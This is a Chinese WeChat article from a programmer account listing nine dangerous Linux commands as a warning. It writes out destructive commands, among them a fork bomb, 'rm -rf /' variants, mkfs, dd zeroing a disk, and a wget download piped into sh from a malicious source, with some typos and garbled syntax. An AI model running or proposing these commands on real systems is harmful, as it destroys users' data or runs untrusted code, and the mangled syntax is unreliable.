微信号:programmer_club

介绍:程序员第一自媒体,与你探讨码农人生路上遇到的各类泛技术话题,定期为你推荐码农人生思考、感悟以及启迪!

9个可能会让你"爆炸"的Linux 命令

2016-09-28 21:58 围城莫


天下三分,群雄争霸,

各方势力风起云涌,

现在的你,拿着的是什么?


在当下的编程世界中,程序员编程时,无非就那三种操作系统,Windows,Mac OS X,Linux这三大类,在国内,很多编程人员偏爱于OS X,或者说,在全世界范围内,大部分程序员都偏爱OS X。


对于这个结果,小编表示挺不理解的,因为在各方面,OS X都属于很平庸的,而且在现在看来,缺陷越来越多。我没法肯定地说,是因为用OS X逼格高,但也应该有这种可能,后来,小编我去看了一下,在硅谷,或者直接说是谷歌,大部分工程师,记住是工程师,不是程序员,很多人分不清这两者的区别。他们常用的操作系统是Linux,还有的是Linux和OS X两个都用,至于为啥没人用Windows,我想你们都懂,不懂就自己去查。


相对来说,Linux是更适合工程师的,无论从那方面来对比。也许你会说OS X简洁、好看,但这有啥用?


既然Linux那么受欢迎,它是不是就很完美呢?并不,这里小编就收集一些Linux代码,它们极具危险性。


还有一些事情需要注意:一些命令只在 Ubuntu 中有 sudo 前缀时是有危害的。其他发行版本的 Linux,则是在作为根目录命令时会有危害。

1. Linux Fork Bomb Command

:(){ :: & };: 以 Fork Bomb 闻名,是一个拒绝服务攻击的 Linux 系统。:(){ :: & };: 是一个 bash 函数。只要被执行,他会不断重复,直到系统被冻结。

你只能重启系统解决这个问题。所以当你在 Linux 界面执行这个命令时一定要注意。

2. Mv Folder/Dev/Null Command

mv folder/dev/null 也是一个危险的命令。Dev/null 或者 null device 是一个删除所有写在这个设备文件上数据的设备文件,但是,该操作提示却是写入操作执行成功。这就是我们常说的 bit bucked 或者 black hole。

3. Rm -Rf Command

rm -rf命令在 Linux 系统中可以快速删除文件夹及其内容。如果,你不知道如何正确使用它,你就只有哭了。

列下m-rf 命令最常见的组合和选择:

  • rm command :删除 Linux 系统的文件

  • rm -f command:不需提示,删除文件中的只读文件

  • rm -r command 循环删除文件夹的内容

  • rm -d command :删除空目录,如果非空目录则不会执行该操作

  • rm -rf/ command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。

  • rm -rf* command :强制删除当前目录中的所有内容(当前工作目录)和字文件夹

  • rm -rf. command:强制删除当前文件夹目录/子目录中的所有内容 。同 rm -r.[^.]*

The rm -r.[^.]* command :删除文件及文件夹,带有删除提示

4. Mkfs Command

如果你不知 mkfs 的作用,那么它也是一个危险的命令,mkfs 之后写的任何命令都将会被一个空白的 linux 文件系统格式化、替代。

下面列举出需要管理员权限,格式化硬盘的命令:

  • mkfs

  • mkfs.ext3

  • mkfs.bfs

  • mkfs.ext2

  • mkfs.minix

  • mkfs.msdos mkfs.reiserfs

  • mkfs.vfat

mkfs.cramfs 也可以和上面的代码做同样的事情,不过不需要管理源权限。

5. Tar Bomb

tar 命令用于将多个文件以 .tar 格式放入一个文件中(存档文件)。Tape Archive (Tar) bomb 可以由他创建。

当为压缩时,就是这个存档文件生成数以万计的相似名称文件出现在当前目录中而不是新目录。

当收到 tar 文件,定期创建一个新的保护目录,然后在解压前将接受的 tar 文件放到这个目录中,你可以避免成为 tar bomb 的受害者。

6. Dd Command

Dd命令用于复制&改变硬盘分区。如果,你用错地方了,那么也很危险。

下面列举 dd 命令:

  • dd if=/dev/hda of=/dev/hdb

  • dd if=/dev/hda of=/dev/sdb

  • dd if=something of=/dev/hda

  • dd if=something of=/dev/sda

下面这个命令会将整个主硬盘清零:dd if=/dev/zero of=/dev/had

7. Shell Script Code

有时候,你可能会被人坑,给你一个 shell 脚本文件,让你去下载并执行它。该脚本可能会包含一些恶意的或危险的代码。命令形式可能会是这样:wget http://some_malicious_source -O- sh。 wget 将会在 sh 狭隘脚本时下载脚本。

8. Malicious Source Code

也许有人会给你源代码让你编译他。代码可能是正常代码,不过,有一些恶意代码伪装在大型源代码中,如果是这样,你的系统就中枪了。如何避免?仅接受并编译可信赖来源的源代码。

9. Decompression Bomb

你已经收到一个压缩文件,你被要求提取这个看起来很小的文件,可能小到 KB。事实上,该小尺寸的压缩文件包含高度压缩数据。

只要文件解压,上百 GB 数据会被提取,这时候,过大的数据填满硬盘导致宕机,几率就很大了。如何避免?还是那句老话,别手贱,什么文件都去接收,请接收可信任来源文件。




了解野狗,点击阅读原文“报名”

 

 
程序员之家 更多文章 这个锅我不背 如何在40岁后继续做软件开发? 大牛们的一些小总结 怎么玩好魔兽或者做好app开发? 谈恋爱不如做开发
猜您喜欢 C# 7.0 新特性1: 基于Tuple的“多”返回值方法 当前人工智能特别是深度学习最前沿的研究方向是什么? 如何实现高可用的redis集群 使用DRPC构建分布式多语言编程架构 软件项目免坑指南